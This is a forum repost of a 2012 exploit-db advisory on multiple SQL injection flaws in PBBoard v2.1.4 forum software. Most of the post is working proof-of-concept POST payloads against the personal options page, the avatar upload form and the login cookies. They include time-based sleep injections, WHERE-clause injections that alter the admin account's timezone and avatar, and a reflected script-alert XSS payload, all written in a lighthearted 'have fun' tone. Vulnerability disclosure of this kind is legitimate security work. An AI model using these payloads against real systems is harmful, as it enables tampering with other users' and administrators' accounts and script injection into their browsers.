The_Arhitect Posted May 30, 2012 Report Posted May 30, 2012 PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities# Title: PBBoard v2.1.4 multiple SQLi Vulnerabilities# Version: 2.1.4# Author/Found by: loneferret# Software Site: http://www.pbboard.com/PBBoard_v2.1.4.zip# Other vulnerabilities: http://www.exploit-db.com/exploits/18937/# Date found: May 29th 2012# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23# Vulnerability:# Due to improper sanitization, many of the parameters are injectable.# Need a user account to trigger these.# As always you can have fun...PoC:Page: Personal Options settingsParameters: style= lang= hide_online= user_time= send_allow= pm_emailed= pm_window= visitormessage=Method: POSTPOST DATA:style=1?=1&hide_online=0&user_time=0&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=2' where id='2' and sleep(5)#&send=SaveBy changing the 'id' number used in the 'where' clause, you can modify another user's settings.Id=1 being admin you can, for example, change his/her timezone POST DATA:style=1?=1&hide_online=0&user_time=+10&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=2' where id='1'#&send=SaveAnother thing, you can get an XSS using the MySQL's error message. Which is always funny.POST DATA:style=1&lang=1&hide_online=0&user_time=+10&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=<script>alert('xss');</script>#&send=SavePoC #2:Here's another example, where we get mysql to sleep for 5 seconds, as wellas change the admin's (id=1) avatar.Page: Change avatarParameter: avatar_path=Method: POSTPOST DATA:-----------------------------68511802421187978011060806853\r\nContent-Disposition: form-data; name="options"\r\n\r\nlist\r\n-----------------------------68511802421187978011060806853\r\nContent-Disposition: form-data; name="avatar_list"\r\n\r\nlook/images/avatar/coof.jpg' where id='1' and sleep(5)#\r\n <--Right Here-----------------------------68511802421187978011060806853\r\nContent-Disposition: form-data; name="avatar"\r\n\r\nhttp://\r\n-----------------------------68511802421187978011060806853\r\nContent-Disposition: form-data; name="upload"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------68511802421187978011060806853\r\nContent-Disposition: form-data; name="change_avatar"\r\n\r\nEdit Settings\r\n-----------------------------68511802421187978011060806853--\r\nPoC #3:SQLi in the cookie. Just need to modify the cookie value usingyour favorite tool.Parameter: PowerBB_username & PowerBB_passwordPowerBB_username=loneferret' and sleep(5)#or PowerBB_password=e10adc3949ba59abbe56e057f20f883e' and sleep(5)#(and if you're wondering there are 58 fields)Sursa: PBBoard v2.1.4 Multiple SQL Injection Vulnerabilities Quote